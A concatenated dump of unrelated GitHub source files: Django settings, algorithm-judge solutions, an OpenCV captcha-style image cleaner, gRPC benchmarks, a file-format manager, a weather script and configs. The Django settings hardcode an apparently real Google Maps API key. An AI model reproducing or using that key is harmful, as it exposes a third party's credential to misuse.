ssl cert is being\n fetched.\n common_name: str, The common name of the ssl cert to be fetched.\n\n Returns:\n resources.Resource, A ref for the ssl cert being fetched. 
Or None if it\n could not be found.\n \"\"\"\n certs = sql_client.sslCerts.List(\n sql_messages.SqlSslCertsListRequest(\n project=instance_ref.project, instance=instance_ref.instance))\n for cert in certs.items:\n if cert.commonName == common_name:\n return cert\n\n return None\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/sql/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"16057693210","text":"# coding=utf-8\nimport os\nfrom cuzquena.util import get_env\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nENV = get_env(BASE_DIR)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n\nEMAIL_HOST = ENV.get('EMAIL_HOST', 'bbdd')\nEMAIL_HOST_USER = ENV.get('EMAIL_HOST_USER', 'bbdd')\nEMAIL_HOST_PASSWORD = ENV.get('EMAIL_HOST_PASSWORD', 'bbdd')\nDEFAULT_FROM_EMAIL = ENV.get('DEFAULT_FROM_EMAIL', 'bbdd')\nSERVER_EMAIL = ENV.get('SERVER_EMAIL', 'bbdd')\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n\nSECRET_KEY = ENV.get('SECRET_KEY', 'bbdd')\nURL_SITE = ENV.get('URL_SITE', 'bbdd')\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ()\n\n\nDJANGO_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nTHIRD_PARTY_APPS = [\n \"geoposition\",\n 'admin_reorder',\n 'django_summernote',\n 'easy_thumbnails',\n 'filebrowser',\n]\n\n\nLOCAL_APPS = [\n \"my_apps.web\",\n \"my_apps.seo\"\n]\n\nINSTALLED_APPS = THIRD_PARTY_APPS + DJANGO_APPS + LOCAL_APPS\nROOT_URLCONF = 'cuzquena.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n \"django.template.context_processors.static\",\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'my_apps.web.processors.processors_site'\n ],\n },\n },\n]\n\nMIDDLEWARE_CLASSES = [\n 'admin_reorder.middleware.ModelAdminReorder',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\n\nWSGI_APPLICATION = 'cuzquena.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': ENV.get('DB_NAME', 'bbdd'),\n 'USER': ENV.get('DB_USER'),\n 'PASSWORD': ENV.get('DB_PASSWORD'),\n 'HOST': 'localhost',\n 'PORT': '',\n 'CONN_MAX_AGE': None,\n }\n}\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\nLANGUAGE_CODE = 'es-pe'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n# LOGIN_URL = \"/\"\nGEOPOSITION_GOOGLE_MAPS_API_KEY = 'AIzaSyAxYmorvw6JL6mAaUZKo3xxIdXyjzzfvF4'\n\nADMIN_REORDER = (\n # Keep original label and models\n # 'sites',\n\n # Rename app\n {'app': 'auth', 'label': u'AUTENTICACIÓN Y AUTORIZACIÓN'},\n {'app': 'web', 'label': u'Configuracion', 'models': (\n {'model': 'web.Configuracion', 'label': 'Configuracion del Sitio'},\n\n )},\n {'app': 'web', 'label': u'Home', 'models': (\n {'model': 'web.HomeBanner', 'label': 'Banner'},\n {'model': 'web.Home', 'label': 'Contenido'},\n )},\n {'app': 'web', 'label': u'Nosotros', 'models': (\n {'model': 'web.Nosotros', 'label': u'Nosotros'},\n {'model': 'web.Valores', 'label': u'Valores'},\n\n )},\n {'app': 'web', 'label': u'Servicios', 'models': (\n {'model': 'web.Servicios', 'label': u'Servicios Banner'},\n {'model': 'web.NuestrosServicios', 'label': u'Nuestros Servicios'},\n\n )},\n {'app': 'web', 'label': u'Vehiculos', 'models': (\n {'model': 'web.VehiculoBanner', 'label': u'Banner'},\n {'model': 'web.Vehiculos', 'label': u'Vehiculos'},\n\n\n )},\n {'app': 'web', 'label': u'Contacto', 'models': (\n {'model': 'web.ContactoBanner', 'label': u'Banner'},\n\n\n )},\n {'app': 'web', 'label': u'Formularios', 'models': (\n {'model': 'web.Contacto', 'label': u'Contacto'},\n {'model': 'web.MovilizarEmpresa', 'label': u'Movilizar a tu Empresa'},\n\n )},\n {'app': 'seo', 'label': u'SEO', 'models': (\n {'model': 'web.SEO', 'label': u'SEO'},\n\n\n )},\n # Reorder app models\n\n # models with custom name\n\n)\nFILEBROWSER_MAX_UPLOAD_SIZE = 26214400 # 25 MB\nFILEBROWSER_NORMALIZE_FILENAME = True\nFILEBROWSER_OVERWRITE_EXISTING = False\nFILEBROWSER_LIST_PER_PAGE = 25\n\nFILEBROWSER_SHOW_PLACEHOLDER = True\nFILEBROWSER_PLACEHOLDER = 'no-disponible/no-disponible.png'\nFILEBROWSER_EXTENSIONS = {\n 'Folder': [''],\n 'Image': ['.jpg', '.jpeg', '.gif', '.png', '.tif', '.tiff'],\n 'Document': ['.pdf', '.doc', '.rtf', '.txt', '.xls', '.csv', '.swf'],\n 'Video': ['.mov', '.wmv', '.mpeg', '.mpg', '.avi'],\n 'Audio': ['.mp3', '.mp4', '.wav', '.aiff', '.midi', '.m4p']\n}\n\nFILEBROWSER_SELECT_FORMATS = {\n 'file': ['Folder', 'Image', 'Document', 'Video', 'Audio'],\n 'image': ['Image'],\n 'document': ['Document'],\n 'media': ['Video', 'Audio'],\n}\nFILEBROWSER_SHOW_IN_DASHBOARD = False\n","repo_name":"danielhuamani/django-la-cuzquena","sub_path":"cuzquena/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7234205378","text":"class Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n edges = {}\n for t in times:\n if t[0] in edges:\n edges[t[0]][t[1]]=t[2]\n else:\n edges[t[0]] ={t[1]:t[2]}\n\n heap = []\n heappush(heap,(0,k))\n visited = set()\n while heap:\n cr = heappop(heap)\n if cr[1] in visited:\n continue\n visited.add(cr[1])\n if cr[1] in edges:\n for e in edges[cr[1]]:\n if e not in visited:\n heappush(heap,(cr[0]+edges[cr[1]][e],e))\n edges.pop(cr[1])\n ans = cr[0]\n \n return ans if len(visited) == n else -1\n 
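# --- Added example (editor's illustration, not part of the original submission) ---
# The heap-based loop above is Dijkstra's algorithm: it repeatedly pops the
# unvisited node with the smallest accumulated delay, so the value popped last
# is the time at which the signal reaches the final node.
# Quick hand-check on the classic LeetCode 743 sample (hypothetical usage):
#
#   times = [[2, 1, 1], [2, 3, 1], [3, 4, 1]], n = 4, k = 2
#   Solution().networkDelayTime([[2, 1, 1], [2, 3, 1], [3, 4, 1]], 4, 2)  # -> 2
#
# The signal reaches nodes 1 and 3 after 1 time unit and node 4 after 2, so the
# answer is the maximum over all nodes, 2; if some node is unreachable,
# len(visited) < n and the function returns -1.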
","repo_name":"gadisamenu/competitive-programming","sub_path":"743-network-delay-time/743-network-delay-time.py","file_name":"743-network-delay-time.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35112192474","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\n\nclass PreProcess(object):\n \n def ConvertToGray(Image):\n GrayImage = cv2.cvtColor(Image,cv2.COLOR_BGR2GRAY)\n return GrayImage\n \n \n def ConvertToBpp(GrayImage):\n App,Bpp = cv2.threshold(GrayImage,130,255,cv2.THRESH_BINARY)\n return Bpp\n\n \n def ConvertToSalt(Bpp,n):\n for k in range(n):\n i = int(np.random.random() * Bpp.shape[1])\n j = int(np.random.random() * Bpp.shape[0])\n if Bpp.ndim == 2:\n Bpp[j,i] = 255\n elif Bpp.ndim == 3:\n Bpp[j,i,0] = 255\n Bpp[j,i,1] = 255\n Bpp[j,i,2] = 255\n return Bpp\n \n \n def ConvertToDilate(Bpp):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(1, 1))\n Bpp = cv2.blur(Bpp, (1,1)) \n Bpp = cv2.medianBlur(Bpp,5) \n# Bpp = PP.ConvertToSalt(Bpp,1000) \n Bpp = cv2.dilate(Bpp,kernel)\n Bpp = cv2.erode(Bpp,kernel) \n return Bpp\n \n def InterferLine(Bpp):\n for i in range(56):\n for j in range(Bpp.shape[0]):\n Bpp[j][i] = 255 \n for j in range(171,Bpp.shape[1]):\n for i in range(Bpp.shape[0]):\n Bpp[i][j] = 255\n m = 1\n n = 1 \n for i in range(50, 171):\n while (m < Bpp.shape[0]-1):\n if Bpp[m][i] == 0:\n if Bpp[m+1][i] == 0:\n n = m+1\n elif m>0 and Bpp[m-1][i] == 0:\n n = m\n m = n-1\n else:\n n = m+1\n break\n elif m != Bpp.shape[0]:\n l = 0\n k = 0\n ll = m\n kk = m\n while(ll>0):\n if Bpp[ll][i] == 0:\n ll = ll-1\n l = l+1\n else:\n break\n while(kk>0):\n if Bpp[kk][i] == 0:\n kk = kk-1\n k = k+1\n else:\n break\n if (l <= k and l != 0) or (k == 0 and l != 0):\n m = m-1\n else:\n m = m+1\n else:\n break\n if m>0 and Bpp[m-1][i] == 0 and Bpp[n-1][i] == 0:\n continue \n# else:\n# Bpp[m][i] = 255\n# Bpp[n][i] = 255\n return Bpp\n \n def InterferPoint(Bpp):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\n Bpp = cv2.dilate(Bpp,kernel)\n# Bpp = cv2.erode(Bpp,kernel)\n return Bpp\n \n \n def CutImage(Bpp):\n TotalBlack = 0\n for j in range(56,170):\n for i in range(50):\n if Bpp[i][j] == 0:\n TotalBlack += 1\n if TotalBlack < 8:\n cv2.line(Bpp,(j,0),(j,50),(120,120,120),1)\n TotalBlack =0\n return Bpp\n \n \nif __name__ == '__main__':\n inpath = 'E:/pest1/nacao/18.png'\n img = cv2.imread(inpath)\n PP = PreProcess\n GrayImage = PP.ConvertToGray(img)\n Bpp = PP.ConvertToBpp(GrayImage)\n Bpp = PP.InterferLine(Bpp) \n Bpp = PP.ConvertToDilate(Bpp) \n Bpp = PP.InterferPoint(Bpp)\n# Bpp = PP.CutImage(Bpp)\n# cv2.imshow('img',Bpp)\n cv2.imwrite('118.png',Bpp)\n# cv2.imwrite('img',img)\n# cv2.waitKey(0)\n \n","repo_name":"nanqianbeiquan/keras","sub_path":"preprocessing/PreProcess.py","file_name":"PreProcess.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5928772591","text":"from .communication import get_value, set_value\n\n\nclass EigerStreamInterface(object):\n \n def __init__(self, host, port=80, api_version=\"1.5.0\"):\n super(EigerStreamInterface, self).__init__()\n self._host = host\n self._port = port\n self._api_v = api_version\n \n def get_enabled(self, timeout=2.0):\n en = get_value(self._host, self._port, self._api_v, \"stream\",\n \"config\", \"mode\", timeout=timeout,\n return_full=False)\n return en == \"enabled\"\n \n def set_enabled(self, 
enabled, timeout=2.0):\n en = \"enabled\" if enabled else \"disabled\"\n set_value(self._host, self._port, self._api_v, \"stream\",\n \"config\", \"mode\", en, timeout=timeout,\n no_data=True)\n \n enabled = property(get_enabled, set_enabled)\n \n","repo_name":"kuntaro0524/eiger","sub_path":"dectris_eiger/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38965176470","text":"# -*- coding: utf-8 -*-\nimport logging\nimport multiprocessing\nfrom datetime import datetime\nfrom raccoon_simple_stopwatch.stopwatch import StopWatch\n\nfrom simple_log_factory.log_factory import log_factory\nfrom client.sensor_client import SensorClient\n\n\ndef _save_reading_worker_grpc(num_requests: int, wid: int):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.save_new_reading(\n sensor_id=\"S1\",\n reading_location_id=\"L1\",\n reading_value=42,\n read_at=datetime.utcnow()\n )\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef _read_reading_worker_grpc(num_requests: int, wid: int, **kwargs):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.get_readings(limit=kwargs[\"limit\"])\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef _read_reading_by_id_worker_grpc(num_requests: int, wid: int, **kwargs):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.get_reading(reading_id=kwargs[\"reading_id\"])\n\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef benchmark_save_reading(num_workers: int, msgs_per_worker: int, worker, **kwargs):\n cpus = multiprocessing.cpu_count()\n timer = StopWatch(auto_start=True)\n\n print(f\"CPUs available: {cpus}\")\n print(f\"Starting benchmark at: {timer.start_datetime}\")\n\n pool = multiprocessing.Pool()\n for wid in range(num_workers):\n pool.apply_async(worker, args=(msgs_per_worker, wid), kwds=kwargs)\n\n print(\"Now waiting...\")\n pool.close()\n pool.join()\n\n elapsed_time = timer.end()\n its = float(msgs_per_worker * num_workers) / float(timer.elapsed(raw=True).total_seconds())\n print(f\"All done! Elapsed time: {elapsed_time}. Requests/Sec: {its}\")\n\n\nif __name__ == '__main__':\n benchmark_save_reading(\n num_workers=1000,\n msgs_per_worker=100,\n worker=_read_reading_by_id_worker_grpc,\n reading_id=\"d764fa3e-753a-4801-9c77-9b9baa1d8bb2\"\n )\n","repo_name":"brenordv/grpc-env-sensors","sub_path":"run_client_benchmark.py","file_name":"run_client_benchmark.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30098559869","text":"# Rainwater 210929\n\"\"\" \n* Algorithm for detecting whether pillars exist\n1. Sweep left -> right; if the next index is lower than the current one, the current spot is a pillar candidate. Always add the last index to the candidates.\n2. Sweep right -> left and collect pillar candidates the same way as in step 1, wherever a lower spot follows.\n3. Take the intersection of the L->R and R->L candidates with a set to pin down the pillars, then\n4. Fill the cells between pillars up to the pillar height to compute the amount of water. The maximum height water can reach is min(left, right height).\n\nInput \nH W are given.\nIntegers between 0 and H inclusive, the heights of the stacked blocks, are given.\n\n* Problem algorithm\n1. If there are 0 or 1 pillars, no water can be held.\n2. Find the pillars. 
Two or more pillars must exist, and all pillars are stored in a list.\n2-1. Same as case 1, but when exactly two pillars exist and they sit right next to each other, no water can be held. Since the candidates by construction do not overlap, this case can be handled as if no pillars exist.\ne.g.) 0230, 0220\n# h3,w6 / 2 1 0 0 2 1 -> p1 should hold 0,1,4,5 and p2 should hold 4, 0.\n# h3,w6 / 0 0 2 2 3 0 -> p1 is 4,5 and p2 is 4, 2, 0 => only one pillar, 4, is produced.\n3. Two or more pillars are needed to move to the next step; otherwise return 0. \nIf water is held, the lower of the two pillars is the maximum height the water can reach.\nIf pillars exist at positions 1 and 3, fill position 2 with water from its current height up to the smaller pillar height.\n# 4 8 / 3 2 1 2 1 0 3 2 -> answer 9, printed 4\nA middle pillar lower than both its left and right neighbors must be ignored.. but that is hard to handle.\n\"\"\"\n\n# 1, My algorithm (counterexample: a lower pillar in the middle must be ignored)\n'''\nh, w = map(int, input().split())\narray = list(map(int, input().split()))\n\n# 1. Only one pillar or none exists\nzeros = array.count(0) \nif zeros == w or zeros == w-1:\n print(0)\n exit()\n\n# 2. Start the pillar-finding algorithm\np1, p2 = [], []\nfor i in range(w): # l->r, p1\n if i != w-1 and array[i] > array[i+1]:\n p1.append(i)\n if i == w-1: # Always including the last index avoids edge cases.\n p1.append(i)\nfor i in range(w-1,-1,-1): # r->l, p2\n if i != 0 and array[i] > array[i-1]:\n p2.append(i)\n if i == 0:\n p2.append(i)\np = list(set(p1) & set(p2))\n\n# 3. At least two pillars are required for the calculation\nif len(p) < 2:\n print(0)\nelse: # Compute the amount of water held.\n # Pair up (left, right) pillars with zip and use the pairs\n # 4 8, 3 1 2 3 4 1 1 2 -> a case that produces 3 pillars\n water = 0\n for i, j in list(zip(p[:], p[1:])):\n height = min(array[i], array[j])\n for k in range(i+1, j):\n water += height - array[k]\n print(water) \n'''\n \n# 2, Answer from the internet - a two-pointer approach\nh, w = map(int, input().split())\narray = list(map(int, input().split()))\n\nl, r = 0, w-1\nmax_l, max_r = array[l], array[r]\n\nwater = 0\n\nwhile l < r:\n max_l = max(max_l, array[l])\n max_r = max(max_r, array[r])\n if max_r >= max_l:\n water += max_l - array[l]\n l += 1\n else:\n water += max_r - array[r]\n r -= 1\nprint(water)","repo_name":"FrancisJeon/Baekjoon-python","sub_path":"BOJ_14719.py","file_name":"BOJ_14719.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35595832956","text":"import os\nimport json, pickle\n\nclass File_Manager:\n ALLOWED_EXTENSIONS = (\n 'json',\n 'csv',\n 'pickle'\n )\n\n def __init__(self, file, file_to_write, path=\"\", *args):\n self.file = file\n self.path = path\n self.filetype = self.set_filetype(self.file)\n self.is_path_exist = self.validate_path()\n self.mode_from_read = self.set_mode_from_read()\n self.to_read = open(self.get_filepath(), self.mode_from_read)\n self.file_to_write = file_to_write\n self.filetype_to_write = self.set_filetype(self.file_to_write)\n self.to_change = args\n self.validated = self.validate()\n self.data = self.set_data()\n self.changes = self.lst_of_changes()\n self.mode_to_write = self.set_mode_to_write()\n self.to_write = open(self.file_to_write, self.mode_to_write)\n self.changed_file = self.change_file()\n self.changed = self.save_file_to()\n\n def validate(self):\n if self.filetype not in self.ALLOWED_EXTENSIONS:\n print(\"Unsupported format\")\n return False\n return True\n\n def validate_path(self):\n if not os.path.exists(self.file):\n raise FileNotFoundError(f\"Files in the given location: {os.listdir(os.curdir)}\")\n \n def lst_to_change(self, *args):\n lst = [x for x in args][0]\n return lst\n\n def set_filetype(self, f):\n return f.split(\".\")[-1]\n\n def get_filepath(self):\n if self.path:\n return f'{self.path}\\{self.file}'\n return self.file\n\n def set_mode_from_read(self):\n if self.filetype == \"csv\":\n return 'r'\n elif self.filetype == 
\"json\":\n return 'r'\n elif self.filetype == \"pickle\":\n return 'rb'\n\n def show_file(self):\n print(self.data)\n\n def lst_of_changes(self):\n lst_to_change = []\n for el in self.to_change:\n for ell in el:\n b = ell.split(\",\")\n c = [int(x) for x in b[:-1]]\n d = c[0], c[1], b[2]\n lst_to_change.append(d)\n return lst_to_change\n\n def change_file(self):\n changed_file = self.data\n changed_file[self.changes[0][0]][self.changes[0][1]] = self.changes[0][2]\n return changed_file\n\n def set_data(self):\n with self.to_read: # to with open ma być przekazane jako do readline\n if hasattr(self, f'get_{self.filetype}_data'):\n return getattr(self, f'get_{self.filetype}_data')()\n print(f\"Konieczna implementacja metody: get_{self.filetype}_data na {self}\")\n return []\n\n def from_where_save_file_to(self):\n if self.filetype_to_write == \"csv\":\n return Csv_Manager\n elif self.filetype_to_write == \"json\":\n return Json_Manager\n elif self.filetype_to_write == \"pickle\":\n return Pickle_Manager\n else:\n raise TypeError(\"Nie ma metody obsługującej ten format.\")\n \n def set_mode_to_write(self):\n if self.filetype_to_write == \"csv\":\n return 'w'\n elif self.filetype_to_write == \"json\":\n return 'w'\n elif self.filetype_to_write == \"pickle\":\n return 'wb'\n\n def save_file_to(self):\n with self.to_write:\n if hasattr(self, f'get_{self.filetype_to_write}_data'):\n return getattr(self, f'save_{self.filetype_to_write}_data')()\n else:\n getattr(self.from_where_save_file_to(),f'save_{self.filetype_to_write}_data')(self)\n print(f\"Konieczna implementacja metody: save_{self.filetype}_data na {self}\")\n return []\n\n\nclass Csv_Manager(File_Manager):\n def get_csv_data(self):\n data = []\n for line in self.to_read.readlines():\n data.append(line.replace(\"\\n\", \"\").split(\";\"))\n return data\n\n def save_csv_data(cls):\n for line in cls.changed_file:\n cls.to_write.write(str(line[0]) + \";\" + str(line[1]) + \"\\n\") \n\nclass Json_Manager(File_Manager):\n def get_json_data(self):\n data = json.loads(self.to_read.read())\n return [[key, value] for key, value in data.items()]\n\n def save_json_data(cls):\n dict_of_changed_file=dict(cls.changed_file)\n json.dump(dict_of_changed_file, cls.to_write)\n\nclass Pickle_Manager(File_Manager):\n def get_pickle_data(self):\n data = pickle.load(self.to_read)\n return [[key, value] for key, value in data.items()]\n\n def save_pickle_data(cls):\n dict_of_changed_file=dict(cls.changed_file)\n print(type(cls.to_write))\n pickle.dump(dict_of_changed_file, cls.to_write)\n\nclass Manager(File_Manager): \n def __new__(cls, file, file_to_write, path, *args, format=\"\"):\n if format==\"csv\":\n return Csv_Manager(file, file_to_write, path, *args)\n elif format==\"json\":\n return Json_Manager(file, file_to_write, path, *args)\n elif format==\"pickle\":\n return Pickle_Manager(file, file_to_write, path, *args)\n print(\"Nie ma metody obsuługującej odczyt danych z tego formatu.\")","repo_name":"Ewelina179/Projects_Future_Collars_Bootcamp","sub_path":"f_manager/manager/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2094823126","text":"import requests, datetime, api_token\ndef weather(URL,time,api_key,city):\n url = URL+time+api_key+city; time = requests.get(url).json()['dt']\n print(datetime.datetime.now().strftime('%H:%M:%S\\n----------'))\n print(requests.get(url).json()['weather'][0]['main'])\n data = 
lambda clas, name: requests.get(url).json()[clas][name]\n temp = data('main', 'temp'); humidity = data('main', 'humidity')\n print(\"Temp: {0:.2f}\".format(temp - 273.15)+u\"\\u00B0\"+'C\\n'+'humidity: '+str(humidity)+\"%\")\n\nweather(URL = 'http://api.openweathermap.org/data/2.5/' ,\\\n time = 'weather' ,\\\n api_key = '?appid=' + f'{api_token.token}' ,\\\n city = '&q=' + 'Moscow' )\n","repo_name":"AlanLatte/MyPrograms","sub_path":"python/projects/Other/weather/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40093675","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom bywyd import prif\n\nAUTHOR = u'Wil Ifan'\nSITENAME = u'The Library of Babel'\nSITESUBTITLE = 'LEAGUES OF SENSELESS CACOPHONIES'\nSITEURL = 'https://oki.nohost.me/babel'\n\nSTATIC_PATHS = ['images', 'extra',]\n#EXTRA_PATH_METADATA = {\n# 'extra/favicon.ico': {'path': 'favicon.ico'}, # Haven't set this yet.\n#}\nFAVICON = \"{{ PATH }}/extra/favicon.ico\"\n\n# To publish an article, add Status: published to the metadata.\nDEFAULT_METADATA = {\n 'status': 'draft',\n}\n\nABOUT = 'Rhydd i bawb ei farn, ac i bob barn ei llafar.'\n\n# Extensions for Markdown. codehilite's 'linenums': 'True' causes all sorts of issues in code blocks.\n#MARKDOWN = {\n# 'extension_configs': {\n# 'markdown.extensions.codehilite': {'css_class': 'highlight'},\n# 'markdown.extensions.extra': {},\n# 'markdown.extensions.meta': {},\n# },\n# 'output_format': 'html5',\n#}\n\n# Defines where Pelican looks for its articles.\nPATH = 'content'\n\n# The theme folder must be in Pelican's root folder (the same one as the content folder).\nTHEME = 'future-imperfect'\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'https://getpelican.com/'),\n ('Python.org', 'https://www.python.org/'),\n ('Jinja2', 'https://palletsprojects.com/p/jinja/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\n# Icon names (second item in tuple) use Font Awesome nomenclature.\nCONTACTS = [\n (\"Twitter\", \"twitter\", \"https://twitter.com\"),\n (\"Facebook\", \"facebook-f\", \"https://facebook.com\"),\n (\"Instagram\", \"instagram\", \"https://www.instagram.com\"),\n (\"Email\", \"envelope\", \"#\"),\n]\n\nDEFAULT_PAGINATION = 3\nSUMMARY_MAX_LENGTH = 20\nSUMMARY_END_SUFFIX = \"...\"\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\n# Enhanced typographical features, e.g. 
correctly formatted em-dashes.\nTYPOGRIFY = True\nTYPOGRIFY_DASHES = 'oldschool_inverted'\n\nMATH_JAX = {\n \"responsive\": True,\n}\n\nJINJA_FILTERS = {\n \"bywyd\": prif,\n}\n\nPHRASES = [ # For use in the `About` section of base.html\n 'Rhydd i bawb ei farn, ac i bob barn ei llafar.',\n 'The universe is trying to turn itself into iron.',\n 'Ydy dy dŷ du di o dan dy dô du di?',\n 'Cofiwch Dryweryn.',\n 'The mediator between the head and the hands must be the heart.',\n]\n","repo_name":"twrchtrwyth/pelican","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43316216352","text":"import numpy as np\nfrom numpy import linalg as la\nfrom utils import dictionary\n\ndef read_questions():\n questions = []\n with open(\"questions-words.txt\", \"r\") as fi:\n for line in fi:\n if line.startswith(':'):\n continue\n words = line.strip().lower().split(' ')\n ids = [dictionary.get(word) for word in words]\n if not all(ids):\n continue\n questions.append(ids)\n return np.array(questions)\n\n# embedding: [vocabulary_size, embedding_size]\ndef predict(embedding, ws):\n # normalize each embedding vector\n # so that cosine distance can be computed easier\n nemb = embedding / np.maximum(la.norm(embedding, axis=1), 1e-12).reshape([embedding.shape[0],1])\n a = nemb[ws[0]]\n b = nemb[ws[1]]\n c = nemb[ws[2]]\n d = b - a + c\n dis = np.matmul(d, np.transpose(nemb))\n return np.argpartition(dis, -4)[-4:]\n\ndef eval(embedding, questions):\n correct = 0\n total = questions.shape[0]\n for ind in range(total):\n print('\\r {}/{}'.format(ind, total), end = '\\r')\n qu = questions[ind]\n ps = predict(embedding, qu[:3])\n for w in ps:\n if w == qu[3]:\n correct += 1\n break\n print(\"Eval %4d/%d accuracy = %4.1f%%\" % (correct, total, correct * 100.0 / total))","repo_name":"pierric/word2vec","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6437134254","text":"# list sort written by Ervin Mamutov - github.com/imervin\n\nimport random\n\n# mergeList function takes 2 lists as parameters\ndef mergeLists(list1, list2):\n # Sorts the two lists\n list1.sort()\n list2.sort()\n\n #Print out the two lists that have been passed in\n print(\"List One:\",list1,\"\\nList Two:\",list2)\n \n # Concats the two lists above to create a new list\n list3 = list1+list2\n\n # Sorts the new list\n list3.sort()\n\n # Prints the new list\n print(list3)\n\n# Pass in two random lists into the function above\nmergeLists([random.randint(1, 100) for i in range(10)], [random.randint(1, 100) for i in range(10)] )\n","repo_name":"ImErvin/Python-Problem-Sheet","sub_path":"list-sort.py","file_name":"list-sort.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17816116620","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.http import HttpResponse\r\nfrom .models import Product\r\nfrom django.template import loader\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n product_list = Product.objects.all()\r\n context = {\r\n 